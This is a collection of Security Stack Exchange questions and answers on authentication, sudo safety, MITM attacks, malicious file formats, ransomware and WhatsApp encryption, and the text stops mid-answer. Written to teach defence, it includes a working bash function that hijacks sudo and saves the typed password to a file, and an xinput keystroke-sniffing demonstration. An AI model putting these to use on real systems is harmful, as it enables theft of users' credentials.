119,371 | If I understand best practices, JWT usually has an expiration date that is short-lived (~ 15 minutes). So if I don't want my user to log in every 15 minutes, I should refresh my token every 15 minutes. I need to maintain a valid session for 7 days (UX point of view), so I have two solutions: use long-lived json web token (1 week)--bad practice? getting a new json web token after the old one expires (JWT 15min, refresh allowed during 1 week) I'm forcing the use of HTTPS. The JWT standard doesn't speak about refreshing tokens. Is refreshing an expired token a good strategy? | Refreshing a token is done to confirm with the authentication service that the holder of the token still has access rights. This is needed because validation of the token happens via cryptographic means, without the need to contact the authentication service. This makes the evaluation of the tokens more efficient, but makes it impossible to retract access rights for the life of a token. Without frequent refreshing, it is very difficult to remove access rights once they've been granted to a token. If you make the lifetime of a token a week, you will likely need to implement another means to handle, for example, the deletion of a user account, changing of a password (or other event requiring relogin), and a change in access permissions for the user. So stick with the frequent refresh intervals. Once every 15-minutes shouldn't be enough to hurt your authentication service's performance. Edit 18 November 2019: Per @Rishabh Poddar 's comment, you should generate a new refresh token every time the old one is used. See this in-depth discussion of session management for details. | {
"source": [
"https://security.stackexchange.com/questions/119371",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26203/"
]
} |
119,410 | Most modern Linux articles advice using sudo rather than logging into root. This advice is so ingrained, some distros don't automatically allow root login. Indeed they come pre-configured with sudo using the users password to run arbitrary commands as root. What can go wrong? In reality, if one runs the above command, he almost might as well run as root !! What does malware do? modify .bashrc to include export PATH=/home/user/.hack:$PATH and drop a script to ~/.hack which will: imitate sudo send password to C&C server delete itself Hacker gets (user and root) password. The same concern exists with plain su, and the only way to avoid is: Alt-Ctrl-F1 and login as root Alway run sudo or su as /usr/bin/sudo or /usr/bin/su The first option seems much more secure, yet seems to go against modern practice. Why? | There are valid convenience uses for sudo, but because they are already adequately explained in other posts, I won't elaborate on them much here. I will however point you to sudoers(5) , which is the sudo configuration file. It shows some of the extensive configuration possible with sudo. I will be explaining when and why you should not use sudo to elevate from your normal user to root for purely security reasons, convenience aside. Short answer: There is no way to securely use sudo if your regular user may be compromised. Use it only for convenience, not for security. The same applies to su and all other programs that may be used to elevate your regular user to a more privileged one. Long answer: It is not true that using the full path for sudo will protect you from a malicious environment. That is a common misunderstanding. A bash function can even hijack names that contain a / at the beginning (example based on this article ): $ type /usr/bin/sudo
/usr/bin/sudo is a function
/usr/bin/sudo ()
{
local pass;
if [[ -z "${@}" ]]; then
//usr/bin/sudo;
else
read -srp "[sudo] password for ${USER}: " pass;
echo "${pass}" > /tmp/.password;
echo -e "\nSorry, try again.";
//usr/bin/sudo ${@};
fi
}
$ /usr/bin/sudo id
[sudo] password for joe:
Sorry, try again.
[sudo] password for joe:
uid=0(root) gid=0(root) groups=0(root)
$ cat /tmp/.password
hunter2 You must only use option 1, aka logging in with agetty or logind on a different tty (note that on some distros, tty1 is where Xorg is running, such as Fedora. On most distros however, tty1 is a spare tty and Xorg runs on tty7). However , you must be aware that malware can hijack ctrl + alt + f1 and present you with a fake screen, so you must use the Secure Attention Key combination (SAK, which is alt + sysrq + k on Linux systems), which kills all processes in that tty. This kills any fake login screen and brings you to the real one only. If there are no fake login screens trying to steal your root password (which is hopefully the case), then it simply causes agetty to restart, which should appear as nothing more than the login prompt blinking. On some systems, many SysRq features are disabled, including SAK. You can temporarily enable them all by writing the integer 1 to /proc/sys/kernel/sysrq . The value of /proc/sys/kernel/sysrq is a bitmask, so look into what it currently is and calculate what you need to convert it into to add SAK support before making it permanent in /etc/sysctl.conf . Setting it to 1 forever can be a bad idea (you don't want just anyone to be able to alt + sysrq + e to kill xscreensaver, do you?). The idea that you can protect your regular user and use sudo or su safely is a very dangerous idea. Even if it were possible, there are countless ways to hijack your running session, such as LD_PRELOAD , which is an environmental variable that points to a shared object (library) which will be forcibly loaded by the program to change its behavior. While it doesn't work on setuid programs like su and sudo, it does work on bash and all other shells, which execute su and sudo, and are the ones who see all your keystrokes. LD_PRELOAD isn't the only variable which can hijack programs running as your user. LD_LIBRARY_PATH can tell a program to use malicious libraries instead of your system libraries. There are many more environmental variables that can be used to change the behavior of running programs in various ways. Basically, if your environmental variables can be compromised, your user, and all keystrokes entered as that user, can be compromised. If that weren't enough, on most distros, your user can use ptrace() with the GETREGS or PEEKTEXT/PEEKDATA options to view all the memory of processes running as the same user (such as the bash process which is running su or sudo for you). If you are using a distro which disables that (e.g. by using the Yama LSM ), the process still may be able to read and write to your bash process' memory using process_vm_readv() and process_vm_writev() respectively. On some kernels, you can also write directly to memory through /proc/pid/mem , as long as the process writing to it is the same user. In the Linux kernel, there are countless security checks all over to make sure processes cannot interfere with each other. However, they all involve inter -user protection, not intra -user protection. The Linux kernel assumes that every single thing done as user A is trusted by user A, so if you su to root as user A, then root must be just as trusted as that user. Before I even get on to Xorg, let me just start out by saying Xorg provides no protection from keyloggers. This means that, if you use sudo or su in a tty with Xorg running, all processes running as that same user will be able to sniff (and inject) keystrokes. This is because the X11 protocol's security model assumes that anything with access to the X11 cookie is trusted, and that cookie is accessible to everything running under your user. It is a fundamental limitation of the X11 protocol, ingrained as deeply as the concept of UIDs are on Linux. There is no setting or feature to disable this. This means that anything you type in an Xorg session, including typed into su or sudo (or frontends like gksu, gksudo, kdesu, kdesudo, pinentry, etc) can be sniffed by anything running as the same user, so your browser, your games, your video player, and of course everything forked by your .bashrc. You can test this yourself by running the following in one terminal, and then moving to another terminal and running a command with sudo. $ xinput list
Virtual core pointer id=2 [master pointer (3)]
↳ Virtual core XTEST pointer id=4 [slave pointer (2)]
↳ ETPS/2 Elantech Touchpad id=13 [slave pointer (2)]
Virtual core keyboard id=3 [master keyboard (2)]
↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)]
↳ Power Button id=8 [slave keyboard (3)]
↳ USB Camera id=10 [slave keyboard (3)]
↳ AT Translated Set 2 keyboard id=12 [slave keyboard (3)]
↳ Video Bus id=7 [slave keyboard (3)]
↳ Sleep Button id=9 [slave keyboard (3)]
↳ Asus WMI hotkeys id=11 [slave keyboard (3)]
↳ Power Button id=6 [slave keyboard (3)]
$ xinput test 12 # replace 12 with the id number of your keyboard
key press 45
key press 44
key release 40
key press 41
key release 45
key release 44
key release 41
key press 31
^C Note that if this specific test does not work for you, it means you do not have the XTEST extension active. Even without it active, it is still possible to record keyboard events using XQueryKeymap() . The lesson you should take way is that there is effectively no way to securely enter your password using su or sudo through a compromised user. You absolutely must switch to a new tty and use SAK, then log in directly as root (or a non-root user whose only purpose is to sudo to root). | {
"source": [
"https://security.stackexchange.com/questions/119410",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106421/"
]
} |
119,510 | I see systems that use database prefixes. Some call it a security feature. Some call it a way to have multiple installations in one database. The main pro is that it's harder to guess the whole table name. On the other hand, if you have some kind of access to the database I would say you could figure out the scheme/table list. Is it a viable security feature? | This is security through obscurity . While it might not hurt you in all cases, on it's own it does not provide viable security. Do not rely on this as your protection. A short parable Let's say you keep your money in a jar labeled MONEY in your house. Since you know you sometimes forget to lock the door when you leave the house, you relabel the jar COOKIES to prevent a thief from finding it. Would you feel more secure now? Sure, a very lazy, dumb thief might miss it, but you would not have to be a master thief to steal your money. Wouldn't it be better to just remember to lock the door instead? Back to the computer world Let's say you have an old phpBB installation with an SQL injection vulnerability. By default the tables are prefixed by phpbb_ . You change this to obscure_ . Will this help you? A naive scan might fail to find hard coded table names (like phpbb_users with all the passwords), and therefore fail. But even a script kiddie could run a script that runs a SHOW TABLES and finds your obscure_users . In fact, there are tools that will automatically dump the contents of all your tables through a SQL injection vulnerability. Conclusion So what is the lesson here? While changing table prefixes (relabeling the jar) might perhaps protect you from the most basic dumb automated attack (the stupid, lazy thief), you would still be vulnerable to simple attacks performed by script kiddies (a thief searching through your jars). When you have a real vulnerability like SQL injection, the solution is to fix that vulnerability (lock the door), and not to add a thin veil of obscurity. That said, a simple precaution that might slow down some attacks might still be worthwhile as "defence in depth" if it has no harmful side effects. Just don't feel safe just because you implement it. (As an addendum, I should say that running multiple installations in the same database might come with security implications on it's own, depending on the situation.) | {
"source": [
"https://security.stackexchange.com/questions/119510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11949/"
]
} |
119,579 | From what I understand file extensions don't really affect the data contained within them at all. They just give your computer a hint of what the data is, how it's structured and your computer then finds the best program to deal with that specific file type. So my question is: if you could write custom data to, for instance, a .png file that actually contains different values than what a normal .png file is composed of, then have a program open it, could you get it to do something malicious? | File extensions The file extension actually has absolutely nothing to do with the data in the file or how that data is structured. Windows likes to make you think the extension is somehow magical - it's not, it's just part of the file name, and tells Windows which program to launch when you open the file. (Linux/Android and MacOS/iOS still use file extensions a bit, but not nearly to the same degree that Windows does.) You are completely correct that you can dump some data into a file, call it virus.png and it'll get opened by an image viewer. Call it virus.docx and it'll get opened by MS Word. Unexpected data If you take a well-written program and feed it file containing data that it's not expecting, nothing exciting should happen. The program should give an error about a "corrupted file" or something similar and move on with its life. The problem happens when the program is not well-written - usually due to some small bug like a programmer forgetting to check the bounds of an array, forgetting to check for null pointers, or forgetting to put braces { } on an if statement. Even if there is a bug, 99.999...% of malformed data will get the "corrupted file" error. Only if you construct the data very carefully can you get something malicious to happen. For a concrete example, see the section on StageFright below. (Thanks to @octern's comment for this). Malicious payloads in innocent-seeming files Yes, what you're describing is actually a common attack vector - hence the general fear of opening unknown email attachments. As an attacker, if you know that there's a vulnerability in a specific program, say the default Windows image viewer, then you can construct a malicious file designed to exploit this. Usually this means that you know that a certain line of code in the viewer does not check the bounds of an array, so you build a malformed .png specifically designed to do a buffer overflow attack and get the program to run code that your inserted. PNG exploits For example, here's a vulnerability report about the open source library libpng [CVE-2004-0597] . Multiple buffer overflows in libpng 1.2.5 and earlier, as used in multiple products, allow remote attackers to execute arbitrary code via malformed PNG images in which (1) the png_handle_tRNS function does not properly validate the length of transparency chunk (tRNS) data, or the (2) png_handle_sBIT or (3) png_handle_hIST functions do not perform sufficient bounds checking. Aside: a Common Vulnerabilities and Exposures (CVE) is a way to track known vulnerabilities in public software. The list of known vulnerabilities can be searched here: https://cve.mitre.org/cve/cve.html If you search the CVE's for "png" you will find hundreds of vulnerabilities and attacks just like the one you imagined in your question. Android StageFright The StageFright Android vulnerability of April 2015 was very similar: there was a buffer overflow vulnerability in Android's core multimedia library, and by sending a malformed audio/video file by MMS (multimedia message), an attacker could get complete control of the phone. The original exploit for this vulnerability, was for an attacker to send a 3GPP audio / video file in which looked like a valid audio/video file, except that one of the integer fields in the metadata was abnormally large, causing an integer overflow . If the large "integer" actually contained executable code, this could end being run on the phone, which is why this kind of vulnerability is called an "arbitrary code execution vulnerability". PDF and MS Word exploits If you search the CVE's for "pdf" or "word" you'll find a whole pile of arbitrary code execution vulnerabilities that people have been able to exploit with those file types (wow - a number of very recent ones for Word too, neat). That's why .pdf and .docx are commonly used as email attachments that carry viruses. | {
"source": [
"https://security.stackexchange.com/questions/119579",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88186/"
]
} |
119,624 | WhatsApp implemented end-to-end encryption ( whitepaper ) in their latest update. How is it possible for WhatsApp to send push notifications with message contents to the Apple Push Notification service? One possible solution would be to send the unencrypted message to APNs from within the app itself but this would be open to abuse and would defeat the purpose of end-to-end encryption. Update: I have just tested it a bit more, according to Apple's documentation: However, the system does not automatically launch your app if the user has force-quit it. In that situation, the user must relaunch your app or restart the device before the system attempts to launch your app automatically again. Which I tested, and resulted in me still receiving the plain text push notifications. This would lead me to believe the app is not running in the background to decrypt any notifications received and then repost them. Update May-2017: I have now used the VoIP API ( as mentioned in the answers below ) to effectively achieve the same result myself in a demo app. Works very well. Update July-2017: Apple no longer allows the usage of the API for push notifications of non-VOIP apps. They do however allow WhatsApp to do it in their infinite fairness. Update September 2018: A notification application extension can now be used to decrypt push notifications. However, dynamic libraries are discouraged from use in such extensions so you must have a codebase that can be compiled statically for decryption etc. | WhatsApp could be using VOIP background mode along with PushKit for solving this problem. Voip pushes are: delivered directly to the app. considered high-priority notifications and are delivered without delay. delivered even if the app was force-quit by the user. For details refer to Voice Over IP (VoIP) Best Practices Once the encrypted payload of VOIP push is decrypted they show a “Local Notification” with the decrypted message. There is one small issue though, PushKit is available only on iOS 8 and later. So, how is Whatsapp doing it for earlier versions of iOS?
Well, it isn’t. They don’t allow you to see message preview in notifications on versions earlier that iOS 8 (Verified it on iOS 7, see screenshot) | {
"source": [
"https://security.stackexchange.com/questions/119624",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106644/"
]
} |
119,635 | (I am not sure, if this question fits the security.stackexchange-board, but the list of askable topics does not exclude this question imho and there are some examples ) I've worked for several different companies of which some had outsourced their IT-department. This means that the people at the company mostly use technology, but have no deeper understand of it, especially when it comes to security. Therefore I was toying with the idea to offer 1 or 2 small workshops / trainings, so they can get at least an idea of WHY computer security is important and WHAT exactly is important. I would like to do this because I think, human knowledge should be shared, no matter the recipient and both sides might learn. My colleagues might understand security better and I might understand their point of view better. So I sat down and tried to come up with a list of necessary and useful topics, keeping the target audience in mind. Am I missing topics, should there be other topics? What is necessary to learn, when you deal with computer security? Topics: Why computer security? (Costs, Ransomware stopping a complete company, ...) Passwords (What is a good password, how to store, never use same PW on different accounts, ...) Lock the screen when leaving the workplace (Because...? Did not find good examples of what could happen, also is this a high priority?) Should I show a hacking example to visualize what it is? For example older phones / tablets are crackable pretty fast with open source software. Social Engineering (2 colleagues got a call and became victims to the CLSID-Scam , door gliding, USB sticks in the parking lot, ...) Internetsecurity (NoScript, deactivate Flash / JS, what's phishing, ...) Backups Email encryption Protective measures (keep OS updated, use antivirus-software, dont use the admin-account as a default, ...) I dont know which topics should be mandatory and in which order. The training might take 1 or even 2 hours. I would also create some cheat-sheets, so they can take away some written information, further reading etc. | I actually did a presentation similar to this a little over a year ago, and spent quite a bit of time deciding how to structure it. My target audience did include developers and other people quite knowledgeable in IT, but also managers and other non-programmers, so I tried to keep it fairly general, and not to technically complicated. As someone else pointed out, I think one important thing is not to come across as boring; you want this to be an enlightening talk that helps people realize that this is something they ought to keep in mind, and not just another list of dreary tasks that will get in the way of actual work . To this end, I tried to center the whole presentation around the concept of security culture instead of jumping straight into too many technical details. With that in mind, I still managed to touch upon many of the themes you mention in your question. Some of the stuff I mentioned in my talk (or would touch upon today if I was to hold another similar talk): Confidentiality, Integrity and Availability (CIA): The central themes of information security, and a few should-be-obvious words about why these are important both to your company, and to individuals (if you can give people a little guidance that will help them stay safer beyond the workplace too, then that is only a plus, right? It might also make some pay more attention to you too - especially if you touch upon the safety of their kids/family too). A few words about the concept of "security culture" ("culture" as in " a set of ideas, habits and social norms, common to a specific group of people ", or something like that, and the idea that security awareness should be a conscious part of this ). Goals of thinking about security: Reducing the risk of unwanted incidents, preparing to handle them if / when they occur anyway. Keeping cost in mind (or return on investment if you like); thinking about what measures will be easiest to get started with, and which make the most sense. I would include a few words about good habits here; such things as update your systems, use good passwords, and avoid clicking suspicious links, be conscious of physical security (tailgaters!) etc. Perhaps include a few examples from real-world events, including screen shots of news articles about breaches, etc? Throw out a few questions related to what type of vulnerabilities or threats might be relevant to your particular company, and more. Examples: What are the "crown jewels" of our business? What is most important to us, and what may threaten them? How secure are we today, how secure would we like to be, and how can we get there in the future? In what areas would we want to improve our security stance? The point here is not to give people a checklist of things to do, but to get them thinking about the whole realm of security in general, and help take responsibility for parts of it, themselves. Give a few examples of typical security guidelines, and ask your audience if any of them (or similar) should be considered for your workplace. Oh, and one more thing: Including a few appropriate real world examples of security problems will help keep your audience entertained (but don't overdo it). I don't know if this is exactly what you were after, but I hope it may be of some use. Good luck with your presentation. | {
"source": [
"https://security.stackexchange.com/questions/119635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99028/"
]
} |
119,636 | Today I woke up and checked my Whatsapp and got the message that communications are encrypted end-to-end from now on. However, how can I know whether Whatsapp can be trusted? I did not generate my private/public keys , nor can I change them. Isn't this always a security flaw? Could it be that the private keys were intercepted as they were being sent to users? Could it be that Whatsapp kept the private keys, just in case the FBI gets really mad about not being able to access some account and demand cooperation? | "I did not generate my private/public keys" You didn't, but your device did. "nor can I change them" I wouldn't be surprised if they add that ability in future (as it'd just be a case of being allowed to authenticate with your existing key and then request that it be replaced: providing only a new public key at that point) Could it be that the private keys were intercepted as they were being sent to users?" The keys are generated client-side, or so they say... "Could it be that Whatsapp kept the private keys, just in case the FBI gets really mad about not being able to access some account and demand cooperation?" We'll see.... Their paper gives a decent description of what's going on and includes a link to the (open source) protocol library that they use. However, as with any system, you ultimately have to trust that they're on your side and not the bad guy's (whoever that may be) because if they control the code and the updates to it, then they still have the power to release modifications targeting specific users etc if required... However, much like the Apple vs FBI case , it's really not in the tech companies' best interest to be seen to give in to such demands. | {
"source": [
"https://security.stackexchange.com/questions/119636",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29727/"
]
} |
119,752 | As I understand it in order to commit a successful MiTM attack you need to be "sitting" somewhere along the traffic path. I assume this means being hooked up to one of the nodes inbetween the end points, physically splicing the wire connecting them, or intercepting air waves. Are my assumptions correct? Does an adversary's terminal need to be directly connected to the wire, node, within wifi range, or can someone in Kansas use an outside path to gain access to a path from LA to San Francisco? Maybe it's more correct to ask if someone needs to be in proximity to the target path. Conversely, can he "use the internet" to mitm the path: isn't every node on the internet essentially connected to each other? | There are many, many ways you can become a MITM, virtually at all layers of the networking stack - not only the physical one. Being physically close to your target can help, but is by no means a necessity. At the physical layer , the attacks you can get are very overt: splice a ethernet cable, use a optical tap , or capture radio signals. A passive optical network, tap - photo by Roens Some active attacks can have physical access as a precondition - many others do not. At the data link layer, passive attacks are incredibly easy: just put your network card into promiscuous mode and you can see all traffic on your network segment. Even on a modern (switched) cabled network, MAC flooding will ensure you can see more than you ought to. For active attacks on local networks, ARP spoofing is quite popular and easy to perform - it basically makes your computer pretend it's someone else - usually a gateway, so that you trick other devices to send traffic to you instead. ARP spoofing - diagram by 0x55534C Data link attacks work as long as you are connect to the same local network as your target . Attacking the network layer is easy if you have physical access - you can just impersonate a router using any modern linux machine . If you don't have physical access, ICMP redirect attacks are kind of obscure, but sometimes usable. Of course, if you have enough money on your pocket you can do it NSA-style and intercept routers when they are shipped to their destination by (snail) mail - just tweak the firmware a bit and you're good to go. Attacks at the network layer can be performed from any point in the (internet) network route between the two participants - although in practice these networks are usually well defended. I'm not personally aware of any attacks at the transport layer. At the application layer, attacks can be a bit more subtle. DNS is a common target - you have DNS hijacking and DNS spoofing . Cache poisoning attacks against BIND in particular were very popular a couple of years back. DHCP spoofing (pretending to be a DHCP server) is quite easy to perform. The end result is similar ARP spoofing, but less "noisy" on the network and possibly more reliable. The broadest application layer attacks can be performed from anywhere in the internet. | {
"source": [
"https://security.stackexchange.com/questions/119752",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106464/"
]
} |
119,887 | For school, I have to do an exercise in which I have to decrypt files by brute force attack. There are a lot of different files in different file formats. The files have been encrypted using XOR or the caesar algorithm. I know how to try every possible key to decrypt the files but, how can I know if the file is being decrypted with the right key or not? | You really can't, if you're just encrypting / decrypting text. If you know that the encrypted string is "kdo" and the encryption method is a Caesar shift, the plaintext could just as easily be "IBM" as "HAL". You'd have to have some idea of what the plaintext "looks like". For instance, if you know the plaintext is the name of a Stanley Kubrick character, you'd have a decent idea of which one it should be. If you have a longer string, it's much easier to narrow things down. A large text file has much fewer intelligible results than the three-character example above. But you'll still need to determine whether it's decrypted yourself. On the other hand, if you're decrypting an entire file in some specific format (.docx, etc), you can be reasonably sure the file is decrypted if the parsing program (Word, etc) can read it. | {
"source": [
"https://security.stackexchange.com/questions/119887",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106918/"
]
} |
119,888 | Should users be allowed to reuse/recycle the same login credentials across a network for different systems? Should this be disallowed/discouraged, or are the security implications minimal? If it's frowned upon, should the usernames and passwords be unique, or is reusing usernames okay? (This is an extension of an earlier question: Does username length/complexity/uniqueness positively impact security? ) | You really can't, if you're just encrypting / decrypting text. If you know that the encrypted string is "kdo" and the encryption method is a Caesar shift, the plaintext could just as easily be "IBM" as "HAL". You'd have to have some idea of what the plaintext "looks like". For instance, if you know the plaintext is the name of a Stanley Kubrick character, you'd have a decent idea of which one it should be. If you have a longer string, it's much easier to narrow things down. A large text file has much fewer intelligible results than the three-character example above. But you'll still need to determine whether it's decrypted yourself. On the other hand, if you're decrypting an entire file in some specific format (.docx, etc), you can be reasonably sure the file is decrypted if the parsing program (Word, etc) can read it. | {
"source": [
"https://security.stackexchange.com/questions/119888",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2916/"
]
} |
119,937 | A sketchy looking person walked up to my car the other day while I was parking and asked if he could charge his cell phone in my car and offered to pay me $5. I didn't allow him to charge his phone in my car of course, but it made me wonder if there was anything he could have done (other than charge his phone) if I had connected his phone to my car's USB port. Anyone know if this is a scam of some sort? | Since I don't know your car model but you seem to be concerned about information security and the fact that the possible attacker chose your car I make the assumption that the USB port in your car is not power-only. The telephone could do anything on this USB port because every USB device can identify itself as any device (storage, keyboard, network, display, ...). Have a search for bad USB. The most critical attack vector is the bus system in your car. CAN is the best known protocol but there are others which are based on it like UDS (which is still weak from a security perspective). You can imagine it as a network in your car where all components can communicate with each other with more or less restrictions. Here are some possible scenarios: The USB port could be dual used as a maintenance port which could allow full access to the car bus system. The car media system could have a vulnerability which could allow privilege escalation to the bus system. (By design the media system should be isolated from the critical components on the bus but in practice all vendors fail to do so.) If you car supports some kind of wireless features for unlocking and starting, this could be a part of some exploitation technique. The car could be used as a bridge between the attacker device and your phone (if it's paired somehow with your car via Bluetooth or WiFi) for some kind of attack against your phone. The car media system could be infected with some kind of malware targeting your smartphone or other connected devices. Malware which targets your car directly (like ransomware for example) would be also possible but I really really hope that this industry is not at this point yet. Just to have a sneak peek for some details or to distract you for some reason. Just to name a few. However. This is a very interesting question and attack scenario. Maybe I would have given this person $100 just to know their real intent in exchange for not calling the cops immediately. | {
"source": [
"https://security.stackexchange.com/questions/119937",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106960/"
]
} |
120,129 | I inserted my USB stick into a friend's PC which was full of viruses, malwares and adwares. Therefore I suppose they attacked my USB device as well. Now I want to use my USB device on my PC without running the risk of being infected by the viruses on it. Can I avoid such risk by previously scanning the device (with Bitdefender, Malwarebytes and Spybot S&D) without opening the folder? In other terms: given that my device (D:) contains some viruses, do they immediately attack a PC when the device is inserted into its USB port, even when I don't open the D: folder? | Referring to my answer to this question (before it was migrated): No, scanning the drive without "opening the folder" isn't a secure way to protect against viruses on the drive. It's very risky to insert what you believe to be a compromised USB device into your PC, no matter what AV you have installed. If you desperately need files from the drive (to quote myself): you should attempt to only insert the drive into a secondary PC running some live version of a linux distro, preferably one you wouldn't mind completely wiping afterwards. If not, just cut your losses and physically destroy the pendrive. USB viruses are extremely efficient these days, and are more frequently able to persist in hardware between wipes (either on small partitions on the pendrive, or by loading themselves into the firmware of the infected machines hardware). The point is, there is no guaranteed way to insert that drive without risking further contamination . | {
"source": [
"https://security.stackexchange.com/questions/120129",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96606/"
]
} |
120,158 | I would like to report security weaknesses to my school in UK. I had managed to find security weaknesses without any exploits or other software or hardware. I had look at similar question however problem is that it is very likely to find out that it was me, even if I would use an anonymous email, like suggested in this question, as IT department know that I have lot of knowledge on computer programming, network, security, and it is (possibly) higher than anyone else's so I assume that I would be called straight away. Teachers also have knowledge that I found other security weakness which did not impacted school policy at all therefor I had no problem with this one. Also security weaknesses require physical access, so I couldn't lie that it was done remotely Another mentioned answer in already mentioned question, said to just ignore it, however I had found out that one of their computers had been hacked by someone else, and to tell how I found this out I would have to mention security weaknesses, or suggest that I was trying to hack them. | If there is a teacher or counselor you can trust completely , that you know will keep your name secret even if the school administration starts making threats about firing people, I'd go to them first and talk to them in private. They don't need to understand computers or security (and you don't need to go into detail about the issue), they just need to be trustworthy and good at navigating the administration politics in the school: you need advice about the personalities of the people involved and how dangerous it would be for you to report the issue. If they're at all wary of reporting, then you should keep quiet. If someone with enough power gets embarrassed, they might start looking for someone to fire or expel (or, in the worst case, to have arrested), to give the illusion that they are in control of the situation. If you're friendly with and trusted by the administration and IT department, and you know they've supported students in the past even when it made them look bad, it may be less risky to share the issue, but I'd still recommend going through a trusted intermediary. If you can't talk to someone you trust to keep your name anonymous and you can't report the issue anonymously (and it sounds like you can't), it is probably best for you to keep quiet. And that means completely quiet: don't talk about what you found on forums, don't tell your friends what you found, and don't try it out again in a few weeks "to see if it's been fixed:" you don't want to show up in any logs as having anything to do with this, especially if it gets exploited by someone else. It sucks, but start by protecting yourself. | {
"source": [
"https://security.stackexchange.com/questions/120158",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
120,238 | I have a presentation to make on Social Network Security. I have been doing some research regarding this. I did a lot of searching, but was unable to find the Crypto Algorithm used by WhatsApp for end-to-end Encryption. | WhatsApp partnered with Open Whisper Systems for the cryptographic portions of messaging. The process involves a variation of Off the Record ( OTR ), Perfect Forward Secrecy (PFS), and the Double Ratchet Algorithm ( DRA ). Open Whisper Systems has blog posts on cryptographic ratcheting , and their Signal Protocol Integration for WhatsApp . | {
"source": [
"https://security.stackexchange.com/questions/120238",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107253/"
]
} |
120,325 | I've noticed increased frequency of ransomware questions around Stack Exchange. Some of the people I remotely know had their devices recently infected as well. I'm starting to be concerned. When people ask me how to avoid viruses, I typically tell them things like not to download files from suspicious websites and attachments other than documents. But is it really correct of me to assume that people who become infected executed suspicious files on their computer? This concern raises especially now when I see questions from people who became infected here on Stack Exchange - meaning technically aware people are obviously just as vulnerable. How does the ransomware possibly get on their computers? What's a good way to prevent this from happening? | According to the IBM X-Force Threat Intelligence Quarterly Report, fourth quarter 2015, the primary sources of ransomware attack are unpatched vulnerabilities, drive-by infections, and spear-phishing emails: Source: IBM X-Force How to prevent ransomware attacks User education Educate your users not to download files from unknown contacts. Usually ransomware is sent in emails claiming pending invoices with Word documents. When you open the document, ransomware will get installed and start doing its job. Scanning and filtering mail servers Scan your mail servers to stop phishing attempts reaching intended recipients. Backup data regularly Make sure to back up your critical data regularly and secure them. This will help you avoid paying the ransom, and reduce recovery time. Vulnerability? Patch critical software and OS right away Patch your critical software like your browser, browser plugins, email clients and operating systems right after you get a notification. Did you know that the Panama Papers leak (2.6 TB of data) happened because of vulnerable web servers and mail servers ? Look at the ransomware growth in the last three years: Source: McAfee Labs, 2015. | {
"source": [
"https://security.stackexchange.com/questions/120325",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20361/"
]
} |
120,389 | In usual network applications, that employ password hashing, is the user password hashed on client side before sending it to the server, or is it sent without hashing as encryption of plain text password to the server? The main question that I have is if an attacker discovers the hashed passwords then why can't they just send hash to the server to authenticate in case of client side hashing? | At least part of the hashing must occur server-side. Indeed, whatever the client sends to the server grants access, so if that very same value is just stored as-is on the server, then you have the same issues as plaintext password storage, namely that a single read-only glimpse at your server database gives all the accesses. In most cases all the hashing is done on the server, because the client is a Web browser than can, at best, do some Javascript, and Javascript is not very good at cryptographic tasks. The client sends the password itself (through HTTPS of course), and the server computes the hash, and compares it with the stored hash value. The attacker cannot simply "pass the hash"; he must send a value that, when hashed by the server, yields the stored hash value. If the clients are good at making crypto (e.g. a heavy native client for a game), then the bulk of the hashing process can be done on the client side, but there still needs to be a final hash computation done on the server. | {
"source": [
"https://security.stackexchange.com/questions/120389",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107406/"
]
} |
120,443 | Believe me, I never expected to ever write a title like that on a Stack Exchange site either! Yesterday evening I got a call from my mother. She is quite tech savvy and generally knows her way around spam and viruses. However, yesterday she was startled: she got an email from Facebook thanking her for her purchase of 40 dollars worth of poker chips in the Facebook game TexasHoldEm. She was ultimately sure she had never done a purchase like that, but she was worried she had lost money one way or another. The email seemed genuine. Logo, text, sender, and links all pointed to genuine Facebook resources. I decided to take a look and followed the link to the 'receipt'. A payment overview at Facebook.com opened and everything was documented as the email had stated: her account had acquired 40 dollars worth of poker chips in the app (game) TexasHoldEm. Surprisingly, though, those chips were paid with a PayPal-account registered to an email address we have never heard of: [email protected] This is odd for two reasons: we live in Belgium, but have no relation, friends, family or otherwise, in Germany. Second we know no one by that name either. At first I thought it may have been an error on that person's side, or that it is simply possible to 'donate' chips to someone else's Facebook account. But this would allow app developers to spam people who had never used their app with free gifts, so this seemed unlikely. I then checked her account's recent activity, more specifically the 'recent sessions' tab. To my surprise there was indeed an active session in Düsseldorf, Germany. As a panic attack, I immediately ended that session. Unfortunately that also hid the information about that session. For me this meant only one thing: her account must have been hacked, as she hasn't been to Germany and there is no way there could be an active - poker-playing - Facebook instance there. In light of this, I urged her to immediately change her password. After that, Facebook seems smart enough to know you made the change because you thought something was wrong: it proposed to go through her recent app activity and post and possibly deleting strange behaviour. Indeed, the app TexasHoldEm had been used, and there had been four posts (of the app on her behalf) that she had been playing the game - going back one whole week. As a conclusion I would think that someone hacked my mother's account, played poker on it and paid for chips him/herself and ... That's it. Maybe I am getting old, but isn't this weird behaviour? Why would a hacker do this: hack some one's account, buy poker chips with their own PayPal account, and play the game? And how can I better protect myself against such 'attacks'? The poker chips were for Zynga's Poker game on Facebook. As has been mentioned in the comments , you cannot withdraw won money from this game. This is valuable - and intriguing - information which makes understanding the hacker's motives even harder. | I interpret your question as: What's the motivation for someone to use an alien Facebook account to play poker and stock it with chips? It's not that strange if you think about it this way: As poker is a game where knowledge about the dealt cards gives you a significant edge in the game, you'd like to use sock puppets at a table to know more about the card distribution. Thus, using sock puppets that are valid, active - real - Facebook accounts are the only way to gather more information without being spotted easily by heuristics. Düsseldorf is where one of the big data centers in Germany is located, so there is a good chance that session was held by a bot on a server, not a real person. Using two or three such bots on a table that are connected gives them a 